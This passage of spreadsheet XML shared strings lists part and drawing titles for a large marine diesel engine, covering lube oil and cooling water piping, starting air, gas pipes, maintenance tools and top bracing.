    <t>SUPPORT-VARIOUS DRAIN</t>
  </si>
  <si>
    <t>DRAIN PIPE FROM BEDPLATE</t>
  </si>
  <si>
    <t>HYDRAULIC OIL PUMPS</t>
  </si>
  <si>
    <t>OUTL.AMOT V.TO LUB.O.COOL</t>
  </si>
  <si>
    <t>DRAIN PIPE, UMBRELLA</t>
  </si>
  <si>
    <t>PARTS LIST-VERTICAL PIPES</t>
  </si>
  <si>
    <t>PARTS LIST-PIPE ON FRAMES</t>
  </si>
  <si>
    <t>LUB.OIL PIPE OUT-CAMSHAFT</t>
  </si>
  <si>
    <t>MAIN PIPE-CYL.LUBRICATOR</t>
  </si>
  <si>
    <t>LUBRICATION OF GOVERNOR</t>
  </si>
  <si>
    <t>SUPPLEMENT-L.O.SYSTEM</t>
  </si>
  <si>
    <t>LUB.OIL PIPE</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-ACTUATOR</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-FUEL CAM</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-BEARING</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-EXHAUST CAM</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-CAM SHIELD</t>
  </si>
  <si>
    <t>VENTING TANK</t>
  </si>
  <si>
    <t>LUBE OIL PIPE-CAMSHAFT</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-DRAIN</t>
  </si>
  <si>
    <t>L.O.PIPE-DRAIN ROL.GUIDE</t>
  </si>
  <si>
    <t>L.O.PIPE-DRAIN LUBRICATOR</t>
  </si>
  <si>
    <t>LUBE OIL PIPE-CYL. LINER</t>
  </si>
  <si>
    <t>MAIN PIPE LUB.O.-ACTUATOR</t>
  </si>
  <si>
    <t>OIL INLET-EXHAUST VALVE</t>
  </si>
  <si>
    <t>SUPPORT-STUFFING BOX</t>
  </si>
  <si>
    <t>PIPE-SCAVENGE BOX</t>
  </si>
  <si>
    <t>P/L-LUB.OIL.PIPE-INSIDE</t>
  </si>
  <si>
    <t>ARR.OF DRAIN</t>
  </si>
  <si>
    <t>VENTING PIPE-CHAIN BOX</t>
  </si>
  <si>
    <t>VAR.PIPES ON CYL.FRAME</t>
  </si>
  <si>
    <t>ARR.INTERNAL LUB.OIL PIPE</t>
  </si>
  <si>
    <t>DRAIN FOR CYL.COVER</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN-CYL.FRAME</t>
  </si>
  <si>
    <t>MAIN PIPE ASSY. CYL.FRAME</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN</t>
  </si>
  <si>
    <t>DRAIN PIPE-LUBRICATOR</t>
  </si>
  <si>
    <t>DRAIN PIPE-TOP GUARD</t>
  </si>
  <si>
    <t>DRAIN PIPE-CYL.COVER</t>
  </si>
  <si>
    <t>DRAIN-SCAVENGE AIR PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE-SCAV AIR REC.</t>
  </si>
  <si>
    <t>DRAIN-BRANCH PIPE</t>
  </si>
  <si>
    <t>FUNNEL-DRAIN CYL.COVER</t>
  </si>
  <si>
    <t>LUB.OIL INLET TURBOCHARG.</t>
  </si>
  <si>
    <t>VARIOUS PIPES-TURBOCHARG.</t>
  </si>
  <si>
    <t>PIPES-UPPER GALLERY-REAR</t>
  </si>
  <si>
    <t>MAIN PIPE-LUB.OIL TC INL.</t>
  </si>
  <si>
    <t>LUB.OIL PIPE TO TEE-PIECE</t>
  </si>
  <si>
    <t>TEE PIECE-TURBOCHARGER</t>
  </si>
  <si>
    <t>MAIN PIPE-LUB.OIL TC OUT.</t>
  </si>
  <si>
    <t>LUB OIL PIPE-FLUSHING</t>
  </si>
  <si>
    <t>L.O.PIPE FROM TEE-PIECE</t>
  </si>
  <si>
    <t>VENT.PIPE T.C. OIL OUTLET</t>
  </si>
  <si>
    <t>RESTRICTING COUPLING</t>
  </si>
  <si>
    <t>THREEWAY COCK WITH HANDLE</t>
  </si>
  <si>
    <t>CONNECTIONS</t>
  </si>
  <si>
    <t>LUBRICATION OF ROCKER ARM</t>
  </si>
  <si>
    <t>CENTRALISED LUBRICATION</t>
  </si>
  <si>
    <t>LUB.OIL PIPE-AIR DISTRIB.</t>
  </si>
  <si>
    <t>SUNDRY LUB.OIL PIPES</t>
  </si>
  <si>
    <t>PIPE TO PRESSURE GAUGE</t>
  </si>
  <si>
    <t>MAIN HYDRAULIC PIPE</t>
  </si>
  <si>
    <t>ARR.LUB.OIL PIPE-KOMPENS.</t>
  </si>
  <si>
    <t>OIL COMPENSATOR</t>
  </si>
  <si>
    <t>SUPPORT F.REDUCING VALVE</t>
  </si>
  <si>
    <t>SUPPORT,ACCUMULATOR BLOCK</t>
  </si>
  <si>
    <t>HYDR.OIL PIPE PUMP UNIT</t>
  </si>
  <si>
    <t>ACCUMULATOR BLOCK COMPL.</t>
  </si>
  <si>
    <t>PIPES TO PUMP UNIT</t>
  </si>
  <si>
    <t>PRESS.EQUALISATION PIPES</t>
  </si>
  <si>
    <t>LUBE OIL PIPE PUMP UNIT</t>
  </si>
  <si>
    <t>CONSTANT PRESS.F.AIR CYL.</t>
  </si>
  <si>
    <t>FLUSHING PIPE</t>
  </si>
  <si>
    <t>HOSE CONNECTIONS PUMPUNIT</t>
  </si>
  <si>
    <t>PIPES + HOSE TO PUMP UNIT</t>
  </si>
  <si>
    <t>DIAGR.ARR.-LUB.OIL PIPES</t>
  </si>
  <si>
    <t>SEALING OIL INLET PIPE</t>
  </si>
  <si>
    <t>SEALING OIL OUTLET PIPE</t>
  </si>
  <si>
    <t>LUB.O. PIPE INLET COOLER</t>
  </si>
  <si>
    <t>LUB.O. PIPE OUTLET COOLER</t>
  </si>
  <si>
    <t>LUB.O. PIPE INLET FILTER</t>
  </si>
  <si>
    <t>LUB.O. PIPE OUTLET FILTER</t>
  </si>
  <si>
    <t>LUB.O. PIPE INLET PUMP</t>
  </si>
  <si>
    <t>LUB.O.PIPE OUTLET PUMP.</t>
  </si>
  <si>
    <t>L.O.-REV.MECH.+GOV.DRIVE</t>
  </si>
  <si>
    <t>BRACKET FOR LUB.O. FILTER</t>
  </si>
  <si>
    <t>ARR. OF HAND PUMP</t>
  </si>
  <si>
    <t>ARR. OF PRE. LUB. PUMP</t>
  </si>
  <si>
    <t>EMERGENCY SUCTION PIPE</t>
  </si>
  <si>
    <t>LUB.OF VALVE SPINDLES</t>
  </si>
  <si>
    <t>LUB. OIL FILTER-MOUNTING</t>
  </si>
  <si>
    <t>VAR.PIPES-BEDPL+FRAME BOX</t>
  </si>
  <si>
    <t>DISTR. PIPE</t>
  </si>
  <si>
    <t>LUB. OIL PIPE OUTLET PUMP</t>
  </si>
  <si>
    <t>L.O.PIPE F.SEALING OIL/GV</t>
  </si>
  <si>
    <t>LUB. OF PUMP ON FORE END</t>
  </si>
  <si>
    <t>LUB. OIL FOR PUMPS</t>
  </si>
  <si>
    <t>SP.PARTS F. PRES.REG.VALV</t>
  </si>
  <si>
    <t>PIPE WITH SOCKET</t>
  </si>
  <si>
    <t>UNIT FOR SEALING OIL</t>
  </si>
  <si>
    <t>MOUNT. OF LUB. OIL PIPES</t>
  </si>
  <si>
    <t>1/2" RESTRICTION</t>
  </si>
  <si>
    <t>OUTLET  LUBE OIL PUMP</t>
  </si>
  <si>
    <t>H.T. SEALING OIL DIAGRAM</t>
  </si>
  <si>
    <t>INLET LUB. OIL PUMP</t>
  </si>
  <si>
    <t>OUTLET LUB. OIL FILTER</t>
  </si>
  <si>
    <t>BRANCH FOR LUB. OIL PIPE</t>
  </si>
  <si>
    <t>OIL VAPOUR DISCHARGE PIPE</t>
  </si>
  <si>
    <t>ARR. OF LUB.OIL SEPARATOR</t>
  </si>
  <si>
    <t>LUB. OIL SEPARATOR</t>
  </si>
  <si>
    <t>ARR. OF PRE. LUBE PUMP</t>
  </si>
  <si>
    <t>ARR. PRE/LUB./HAND W.PUMP</t>
  </si>
  <si>
    <t>LUB.O.PIPE GENERATOR OUTL</t>
  </si>
  <si>
    <t>ARR.OF CENTRIFUGAL FILTER</t>
  </si>
  <si>
    <t>LUB.O. OUTL. GEN. BEARING</t>
  </si>
  <si>
    <t>ARR. OF LUB. OIL PIPE</t>
  </si>
  <si>
    <t>ARR. OF SEALING OIL PIPES</t>
  </si>
  <si>
    <t>SEALING OIL DIST. PIPE</t>
  </si>
  <si>
    <t>SEALING OIL COLL. PIPE</t>
  </si>
  <si>
    <t>ARR. OF PRELUB.OIL PUMP</t>
  </si>
  <si>
    <t>STARTING AIR PIPES,COMPL.</t>
  </si>
  <si>
    <t>MAIN PIPE-STARTING AIR</t>
  </si>
  <si>
    <t>STARTING AIR PIPE-VALVE</t>
  </si>
  <si>
    <t>PIPE FOR PUNCTURE VALVE</t>
  </si>
  <si>
    <t>MAIN STARTING VALVE</t>
  </si>
  <si>
    <t>VARIOUS PIPES-CYL.COVER</t>
  </si>
  <si>
    <t>INLET PIPE-STARTING AIR</t>
  </si>
  <si>
    <t>ARR.OF MAIN START.VALVE</t>
  </si>
  <si>
    <t>BRANCH PIPE-STARTING AIR</t>
  </si>
  <si>
    <t>SUPPORT-STARTING AIR</t>
  </si>
  <si>
    <t>COMPENSATOR-STARTING AIR</t>
  </si>
  <si>
    <t>BURSTING CAP,COMPLETE</t>
  </si>
  <si>
    <t>CONTROL+SAFETY AIR PIPES</t>
  </si>
  <si>
    <t>PIPES-ST.AIR DISTRIBUTOR</t>
  </si>
  <si>
    <t>EXH. VALVE PUNCTURE PIPE</t>
  </si>
  <si>
    <t>START. AIR PIPE-DISTRIB.</t>
  </si>
  <si>
    <t>SUPPORT-SEALING AIR</t>
  </si>
  <si>
    <t>PIPES, ST.AIR DISTRIBUTOR</t>
  </si>
  <si>
    <t>CONTR.AIR PIPE-FUEL PUMP</t>
  </si>
  <si>
    <t>SEALING AIR P.EXH.VALVE</t>
  </si>
  <si>
    <t>SEALING AIR INVA BLOCK</t>
  </si>
  <si>
    <t>NIPPLE WITH ORIFICE</t>
  </si>
  <si>
    <t>CLEANING PIPES-T.C.</t>
  </si>
  <si>
    <t>THREE-WAY VALVES</t>
  </si>
  <si>
    <t>CONTROL AIR PIPE BY-PASS</t>
  </si>
  <si>
    <t>CONTR.AIR PIPE PUNC.VALVE</t>
  </si>
  <si>
    <t>ST.AIR PIPE-DISTRIBUTOR</t>
  </si>
  <si>
    <t>WATER CLEANING TC</t>
  </si>
  <si>
    <t>DRY CLEANING TC</t>
  </si>
  <si>
    <t>DRY CLEANING PIPE</t>
  </si>
  <si>
    <t>PIPE FOR AIR CYLINDER</t>
  </si>
  <si>
    <t>AIR PIPE FOR DRAIN OF TC</t>
  </si>
  <si>
    <t>PRESSURE EQUALIZING PIPE</t>
  </si>
  <si>
    <t>MAIN PIPE VENTILATION</t>
  </si>
  <si>
    <t>ARR.OF SEALING OIL PIPES</t>
  </si>
  <si>
    <t>MAIN PIPE SEALING OIL</t>
  </si>
  <si>
    <t>SEALING OIL PIPE</t>
  </si>
  <si>
    <t>CONTROL OIL PIPE</t>
  </si>
  <si>
    <t>BRANCH PIPE-VENTILATION</t>
  </si>
  <si>
    <t>ARR. SEAL/CONTR.OIL PIPES</t>
  </si>
  <si>
    <t>MAIN PIPE SEAL/CONTR.OIL</t>
  </si>
  <si>
    <t>MAIN PIPE CONTROL OIL</t>
  </si>
  <si>
    <t>BURSTING CAP</t>
  </si>
  <si>
    <t>ARR. OF PILOT AIR PIPES</t>
  </si>
  <si>
    <t>STARTING AIR DISTR. PIPE</t>
  </si>
  <si>
    <t>COMPRESSED AIR TO T.C.</t>
  </si>
  <si>
    <t>ARR. OF JET SYSTEM</t>
  </si>
  <si>
    <t>ARR. OF STARTING AIR PIPE</t>
  </si>
  <si>
    <t>PROTECTIVE DEVICE</t>
  </si>
  <si>
    <t>ARRANGEMENT OF ICS</t>
  </si>
  <si>
    <t>ARR. OF REMOTE START</t>
  </si>
  <si>
    <t>ARR. OF SLOW TURNING</t>
  </si>
  <si>
    <t>MAIN PIPES EXHAUST SIDE</t>
  </si>
  <si>
    <t>FRESHWATER PIPE, OUTLET</t>
  </si>
  <si>
    <t>FRESHW.PIPE OUT.CYL.COVER</t>
  </si>
  <si>
    <t>FRESHWATER PIPE, INLET</t>
  </si>
  <si>
    <t>COOL.W.PIPE-TURBOCHARGER</t>
  </si>
  <si>
    <t>MAIN PIPES,UPPER EXH.SIDE</t>
  </si>
  <si>
    <t>MAIN PIPE ASSEMBLY,EXH.</t>
  </si>
  <si>
    <t>MAIN PIPE-FRESH COOL.WAT.</t>
  </si>
  <si>
    <t>PIPE BENDS</t>
  </si>
  <si>
    <t>DRAIN PIPES,ASSEMBLY EXH.</t>
  </si>
  <si>
    <t>MAIN PIPE-FRESHWATER OUT.</t>
  </si>
  <si>
    <t>FRESHW. PIPES OUTLET ASSY</t>
  </si>
  <si>
    <t>VARIOUS PIPES FORE END</t>
  </si>
  <si>
    <t>TELL-TALE PIPE F. O-RINGS</t>
  </si>
  <si>
    <t>SUPPORT,CLEAN.INSTRUCTION</t>
  </si>
  <si>
    <t>SUPPORT-FRESHW. FIXED</t>
  </si>
  <si>
    <t>SUPPORT-FRESHW. MOVABLE</t>
  </si>
  <si>
    <t>CONNECTING PIPE-CYL.COVER</t>
  </si>
  <si>
    <t>COOL.W.PIPE-CYL.FRAME</t>
  </si>
  <si>
    <t>BRANCH PIPES</t>
  </si>
  <si>
    <t>PIPE-COOLING WATER</t>
  </si>
  <si>
    <t>MAIN PIPE-COOLING WATER</t>
  </si>
  <si>
    <t>COOL.W.PIPE-CYL.COVER</t>
  </si>
  <si>
    <t>TEE PIECE-COOLING WATER</t>
  </si>
  <si>
    <t>INDICATOR PIPE</t>
  </si>
  <si>
    <t>FLANGE F.CONNECT.OF VALVE</t>
  </si>
  <si>
    <t>COOLING WATER PIPES-T.C.</t>
  </si>
  <si>
    <t>PARTS LIST-VENTING</t>
  </si>
  <si>
    <t>MAIN PIPE, DRAIN</t>
  </si>
  <si>
    <t>MAIN PIPE-DRAIN FRESH W.</t>
  </si>
  <si>
    <t>DRAIN PIPE AUX. BLOWER</t>
  </si>
  <si>
    <t>DRAIN FUNNEL-FRESH WATER</t>
  </si>
  <si>
    <t>DRAIN FUNNEL-TC</t>
  </si>
  <si>
    <t>DRAIN PIPE, FRESHWATER</t>
  </si>
  <si>
    <t>MAIN PIPE-CLEANING TC</t>
  </si>
  <si>
    <t>CLEANING OF AIR COOLER</t>
  </si>
  <si>
    <t>MAIN PIPE-CLEANING AC</t>
  </si>
  <si>
    <t>CLEANING PIPES-TC</t>
  </si>
  <si>
    <t>TEE-PIECE</t>
  </si>
  <si>
    <t>CLEANING PIPE-TC</t>
  </si>
  <si>
    <t>MAIN PIPE-CLEAN.AIR COOL.</t>
  </si>
  <si>
    <t>GUIDE-CLEANING PIPE</t>
  </si>
  <si>
    <t>STEAM PIPE FOR CLEANING</t>
  </si>
  <si>
    <t>COOL.W.PIPE-AIR COOLER</t>
  </si>
  <si>
    <t>COOLING WATER PIPES-A.C.</t>
  </si>
  <si>
    <t>VAR. PIPES, FRAMEBOX EXH.</t>
  </si>
  <si>
    <t>WATER SEPERATOR DRAIN</t>
  </si>
  <si>
    <t>VARIOUS PIPES-FRAME BOX</t>
  </si>
  <si>
    <t>DRAIN PIPE-AC</t>
  </si>
  <si>
    <t>WATER TRAP, BEFORE WMC</t>
  </si>
  <si>
    <t>DRAIN FUNNEL-AC</t>
  </si>
  <si>
    <t>LAMELLA ASSEMBLY</t>
  </si>
  <si>
    <t>DRAIN PIPE W.MIST CATCHER</t>
  </si>
  <si>
    <t>COLUMN, W.MIST CATCHER</t>
  </si>
  <si>
    <t>TEST BED, WATER MIST CATC</t>
  </si>
  <si>
    <t>SEAWATER COOLING SYSTEM</t>
  </si>
  <si>
    <t>COOLING W.SYSTEM, FRESHW.</t>
  </si>
  <si>
    <t>CENTRAL COOL.WATER SYSTEM</t>
  </si>
  <si>
    <t>RAWWATER COOLING SYSTEM</t>
  </si>
  <si>
    <t>2-STAGE COOL.WATER SYSTEM</t>
  </si>
  <si>
    <t>TOWER COOL. WATER SYSTEM</t>
  </si>
  <si>
    <t>DE-AERATING TNK.ALARM DEV</t>
  </si>
  <si>
    <t>DE-AERATING TANK</t>
  </si>
  <si>
    <t>JACKET COOL. WATER SYSTEM</t>
  </si>
  <si>
    <t>STEAM HEATING SYSTEM</t>
  </si>
  <si>
    <t>CONICAL PIPE</t>
  </si>
  <si>
    <t>COOLING WATER DISTR.PIPE</t>
  </si>
  <si>
    <t>COOLING WATER COLL.PIPE</t>
  </si>
  <si>
    <t>COOL.W. PIPE LUB.O.COOLER</t>
  </si>
  <si>
    <t>L.T. INLET PUMP</t>
  </si>
  <si>
    <t>L.T. INLET LUB. OIL COOL.</t>
  </si>
  <si>
    <t>MOUNT. OF COOL. W. PIPES</t>
  </si>
  <si>
    <t>L.T. OUTLET PUMP</t>
  </si>
  <si>
    <t>L.T. INLET GENERATOR</t>
  </si>
  <si>
    <t>L.T. OUTLET GENERATOR</t>
  </si>
  <si>
    <t>L.T. OUTLET LUB. OIL COOL</t>
  </si>
  <si>
    <t>L.T. IN-/OUTL. AIR COOLER</t>
  </si>
  <si>
    <t>H.T. IN-/OUTL. AIR COOLER</t>
  </si>
  <si>
    <t>F.W. OUTLET COLL. PIPES</t>
  </si>
  <si>
    <t>L.T. INLET CH. AIR COOLER</t>
  </si>
  <si>
    <t>H.T. OUTLET TURBOCHARGER</t>
  </si>
  <si>
    <t>L.T. OUTLET CH.AIR COOLER</t>
  </si>
  <si>
    <t>H.T. PIPE FOR PREHEATER</t>
  </si>
  <si>
    <t>OUTLET PUMP, INLET COOLER</t>
  </si>
  <si>
    <t>H.T. INLET LUB. O. COOLER</t>
  </si>
  <si>
    <t>H.T. OUTLET LUB.O. COOLER</t>
  </si>
  <si>
    <t>H.T. OUTLET PUMP</t>
  </si>
  <si>
    <t>F.W. INLET CH.AIR COOLER</t>
  </si>
  <si>
    <t>H.T. OUTLET 3 WAY VALVE</t>
  </si>
  <si>
    <t>H.T. INLET ENGINE</t>
  </si>
  <si>
    <t>H.T. INLET THERM. VALVE</t>
  </si>
  <si>
    <t>MOUNTING OF 3-WAY VALVE</t>
  </si>
  <si>
    <t>H.T. OUTLET COLLECT. PIPE</t>
  </si>
  <si>
    <t>H.T. INLET 3-WAY VALVE</t>
  </si>
  <si>
    <t>H.T. INLET PUMP</t>
  </si>
  <si>
    <t>BRANCH FOR COLLECT. PIPE</t>
  </si>
  <si>
    <t>TURBOCHARGER LUB.OIL SYST</t>
  </si>
  <si>
    <t>CAMSHAFT LUB.OIL SYSTEM</t>
  </si>
  <si>
    <t>GAS PIPE ARR.</t>
  </si>
  <si>
    <t>GAS MAIN PIPE - INNER</t>
  </si>
  <si>
    <t>GAS MAIN PIPE - COMPLETE</t>
  </si>
  <si>
    <t>GAS MAIN PIPE - OUTER</t>
  </si>
  <si>
    <t>UNDER PINNING</t>
  </si>
  <si>
    <t>GAS INLET PIPE</t>
  </si>
  <si>
    <t>FLEXIBLE TUBE COMPLETE</t>
  </si>
  <si>
    <t>FLEXIBLE TUBE DETAILS</t>
  </si>
  <si>
    <t>ASS. OF FLOW CHECK VALVE</t>
  </si>
  <si>
    <t>GAS MAIN PIPE A SIDE</t>
  </si>
  <si>
    <t>GAS MAIN PIPE INNER EXT.</t>
  </si>
  <si>
    <t>ARR. OF PIPES</t>
  </si>
  <si>
    <t>STANDARD TOOLS</t>
  </si>
  <si>
    <t>FOOT GRATING</t>
  </si>
  <si>
    <t>PNEU.TOOL-TIGHTEN.OF NUTS</t>
  </si>
  <si>
    <t>ACCESSORIES-HYDR.TOOLS</t>
  </si>
  <si>
    <t>HOOK WRENCH</t>
  </si>
  <si>
    <t>PLIERS FOR RETAINING RING</t>
  </si>
  <si>
    <t>TORQUE WRENCHES</t>
  </si>
  <si>
    <t>BOX AND CROWFOOT WRENCHES</t>
  </si>
  <si>
    <t>OPEN ENDED SPANNERS</t>
  </si>
  <si>
    <t>OPEN ENDED SLUGG.SPANNERS</t>
  </si>
  <si>
    <t>DOUBLE OPEN ENDED WRENCH</t>
  </si>
  <si>
    <t>RING WRENCHES</t>
  </si>
  <si>
    <t>COMBINATION WRENCHES</t>
  </si>
  <si>
    <t>RING IMPACT WRENCHES</t>
  </si>
  <si>
    <t>HYDR.JACK COMPLETE SET</t>
  </si>
  <si>
    <t>HYDR.JACK HOLD.DOWN BOLT</t>
  </si>
  <si>
    <t>HYDR.JACK END CHOCK BOLT</t>
  </si>
  <si>
    <t>HYDR.JACK TOP BRACING</t>
  </si>
  <si>
    <t>SHUT-OFF NIPPLE</t>
  </si>
  <si>
    <t>PULLING SCREW</t>
  </si>
  <si>
    <t>ARR.PIN GAUGE COMPLETE</t>
  </si>
  <si>
    <t>LIFTING TOOL-FRAME BOX</t>
  </si>
  <si>
    <t>LIFT.TOOL,CON.ROD COMPL.</t>
  </si>
  <si>
    <t>LIFT.TOOL, CHAINWH.FRAME</t>
  </si>
  <si>
    <t>LIFT. TOOLS, ENGINE PARTS</t>
  </si>
  <si>
    <t>LIFTING OF ENGINE COMPL.</t>
  </si>
  <si>
    <t>LIFT.-TOP SECTION COMPL.</t>
  </si>
  <si>
    <t>LIFT BOTTOM SEC. COMPLETE</t>
  </si>
  <si>
    <t>LIFTING ENGINE VARIANT 2</t>
  </si>
  <si>
    <t>LIFTING ENGINE VARIANT 3</t>
  </si>
  <si>
    <t>LIFTING ENGINE VARIANT 4</t>
  </si>
  <si>
    <t>LIFTING OF SECTIONS</t>
  </si>
  <si>
    <t>LIFTING REMAINING PARTS</t>
  </si>
  <si>
    <t>LASHING OF ENGINE COMPLET</t>
  </si>
  <si>
    <t>GUIDE FORCE COMPENSATOR</t>
  </si>
  <si>
    <t>CHAIN TIGTENER</t>
  </si>
  <si>
    <t>PRESS.TEST TOOL,VOC VALVE</t>
  </si>
  <si>
    <t>PRESS.TEST TOOL,VOC BLOCK</t>
  </si>
  <si>
    <t>PRES.TEST TOOL,VOC OUTLET</t>
  </si>
  <si>
    <t>PRES.TEST TOOL,CONTR.FEED</t>
  </si>
  <si>
    <t>PRESS.TEST TOOL,VOC INLET</t>
  </si>
  <si>
    <t>FLUSHING TOOL,VOC BLOCK</t>
  </si>
  <si>
    <t>TEST TOOL,BLOW OFF VALVE</t>
  </si>
  <si>
    <t>ADAPTOR F. BLOWOFF VALVE</t>
  </si>
  <si>
    <t>ADAPTOR F. SHUTDOWN VALVE</t>
  </si>
  <si>
    <t>TEST,CONTR/SEAL OIL DRAIN</t>
  </si>
  <si>
    <t>JACK F. VOC BLOCK</t>
  </si>
  <si>
    <t>SUPPORT FOR VOC BLOCK</t>
  </si>
  <si>
    <t>TEST TOOL,SHUT DOWN VALVE</t>
  </si>
  <si>
    <t>EXTRACTOR FOR GEARBOX</t>
  </si>
  <si>
    <t>TOOL FOR CYLINDER UNIT</t>
  </si>
  <si>
    <t>TOOL FOR CRANK+CAMSHAFTS</t>
  </si>
  <si>
    <t>OVERHAUL TOOL F. CYL.UNIT</t>
  </si>
  <si>
    <t>STD. TOOLS</t>
  </si>
  <si>
    <t>SPARE PARTS AND TOOLS</t>
  </si>
  <si>
    <t>TOOL F. M. OF SEAL. RING</t>
  </si>
  <si>
    <t>PULL LIFT</t>
  </si>
  <si>
    <t>TOOL LOCKER COMPLETE</t>
  </si>
  <si>
    <t>TOOLS FOR V23H</t>
  </si>
  <si>
    <t>TOOLS FOR 26MTB-40</t>
  </si>
  <si>
    <t>TOOLS FOR 26MTB-40V</t>
  </si>
  <si>
    <t>TOOLS FOR S28H</t>
  </si>
  <si>
    <t>TOOLS FOR U28H</t>
  </si>
  <si>
    <t>TOOLS FOR U45H</t>
  </si>
  <si>
    <t>TOOLS FOR S50</t>
  </si>
  <si>
    <t>TOOLS FOR U50</t>
  </si>
  <si>
    <t>TOOLS FOR S35P</t>
  </si>
  <si>
    <t>OPERAT.MAINT.COMP.INSTRUC</t>
  </si>
  <si>
    <t>CYLINDER COVER, TOOLS</t>
  </si>
  <si>
    <t>PIST.+ROD+STUFF.BOX,TOOLS</t>
  </si>
  <si>
    <t>CYL.LINER+LUBRICAT.,TOOLS</t>
  </si>
  <si>
    <t>CROSSHEAD+CONN.ROD,TOOLS</t>
  </si>
  <si>
    <t>CRANKSH.+THRUST BRG,TOOLS</t>
  </si>
  <si>
    <t>MECH.CONTROL GEAR,TOOLS</t>
  </si>
  <si>
    <t>STARTING AIR SYSTEM,TOOLS</t>
  </si>
  <si>
    <t>EXHAUST VALVE, TOOLS</t>
  </si>
  <si>
    <t>FUEL OIL SYSTEM, TOOLS</t>
  </si>
  <si>
    <t>TURBOCHARGER SYSTEM,TOOLS</t>
  </si>
  <si>
    <t>SAFETY EQUIMPENT,TOOLS</t>
  </si>
  <si>
    <t>ASSY OF LARGE PARTS,TOOLS</t>
  </si>
  <si>
    <t>GENERAL TOOLS</t>
  </si>
  <si>
    <t>EXTRA TOOLS (OPTION)</t>
  </si>
  <si>
    <t>TOOLS MS-924 EPOXY CHOCKS</t>
  </si>
  <si>
    <t>TOOLS FOR MS-925</t>
  </si>
  <si>
    <t>TOOLS FOR MS-926</t>
  </si>
  <si>
    <t>SPANNER FOR FUEL PUMP</t>
  </si>
  <si>
    <t>SPANNER F. OVERSPEED STOP</t>
  </si>
  <si>
    <t>LIST OF EXTRA TOOLS</t>
  </si>
  <si>
    <t>GRINDING TABLE</t>
  </si>
  <si>
    <t>GUIDE FOR GRINDING TABLE</t>
  </si>
  <si>
    <t>GRINDING TABLE COMPLETE</t>
  </si>
  <si>
    <t>GRINDING TABLE MOUNTED</t>
  </si>
  <si>
    <t>BRACKET-MOUNTING TOOL</t>
  </si>
  <si>
    <t>THRUST PIECE-MOUNT. TOOL</t>
  </si>
  <si>
    <t>TOOLS ON PANEL</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 903</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 907</t>
  </si>
  <si>
    <t>TOOLS ON PANEL MS 911</t>
  </si>
  <si>
    <t>PANEL FOR TOOLS</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-901</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-902</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-903</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-904</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-905</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-906</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-907</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-908</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-909</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-910</t>
  </si>
  <si>
    <t>PANEL AND PANEL TOOLS-912</t>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 2 OUTLET</t>
  </si>
  <si>
    <t>LUB.OIL BOTTOMTK 3 OUTLET</t>
  </si>
  <si>
    <t>MANHOLE COVER,BOTTOM TANK</t>
  </si>
  <si>
    <t>ARRANGEMENT-FUEL OIL UNIT</t>
  </si>
  <si>
    <t>HOPPER</t>
  </si>
  <si>
    <t>ARRANGEMENT-CAMSHAFT UNIT</t>
  </si>
  <si>
    <t>ARR.DRAIN TANK UNIT</t>
  </si>
  <si>
    <t>ARR. OF CYL. LUB. BOOSTER</t>
  </si>
  <si>
    <t>CYL. LUB.OIL BOOSTER UNIT</t>
  </si>
  <si>
    <t>SEALING OIL PUMP UNIT</t>
  </si>
  <si>
    <t>ARRANGEMENT-UNIFUEL</t>
  </si>
  <si>
    <t>ARR.OF PRESSURE GAUGE</t>
  </si>
  <si>
    <t>CONTROL OIL PUMP UNIT</t>
  </si>
  <si>
    <t>FLANGE ASSEMBLING PARTS</t>
  </si>
  <si>
    <t>ARR.OF SUPPORT. STRUCTURE</t>
  </si>
  <si>
    <t>PIPE FOR INLET</t>
  </si>
  <si>
    <t>PIPE-INLET PUMP</t>
  </si>
  <si>
    <t>PIPE-OUTLET PUMP</t>
  </si>
  <si>
    <t>PIPE-INLET FILTER</t>
  </si>
  <si>
    <t>PIPE-INLET PREHEATER</t>
  </si>
  <si>
    <t>PIPE-OUTLET PREHEATER</t>
  </si>
  <si>
    <t>PIPE-INLET COOLER</t>
  </si>
  <si>
    <t>PIPE-OUTLET COOLER</t>
  </si>
  <si>
    <t>PIPE-INLET VISCOTHERM</t>
  </si>
  <si>
    <t>PIPE-OUTLET VISCOTHERM</t>
  </si>
  <si>
    <t>ARR. OF INSTRUMENTPANEL</t>
  </si>
  <si>
    <t>WELDED ASSEMBLY</t>
  </si>
  <si>
    <t>PIPE ASSEMBLY</t>
  </si>
  <si>
    <t>ARRANGEMENT,EMULSION UNIT</t>
  </si>
  <si>
    <t>HYDRAULIC FILTER UNIT</t>
  </si>
  <si>
    <t>TOP BRACING ASSEMBLY</t>
  </si>
  <si>
    <t>LINKS FOR TOP BRACING</t>
  </si>
  <si>
    <t>FITT.BOLT F.TOP BRACING</t>
  </si>
  <si>
    <t>TOP BRACING OUTLINE</t>
  </si>
  <si>
    <t>HYDR.TOP BRACING SYSTEM</t>
  </si>
  <si>
    <t>HYDR.TOP BRACING ARR.</t>
  </si>
  <si>
    <t>SUPPORTING BRACKET</t>
  </si>
  <si>
    <t>PREPARATIONS F.HYDR.TOPBR</t>
  </si>
  <si>
    <t>EQUIPMENT F.HYDR.BRACING</t>
  </si>
  <si>
    <t>HYDRAULIC TOP DAMPER ARR.</t>
  </si>
  <si>
    <t>HYDR.TOP DAMPER SYSTEM</t>
  </si>
  <si>
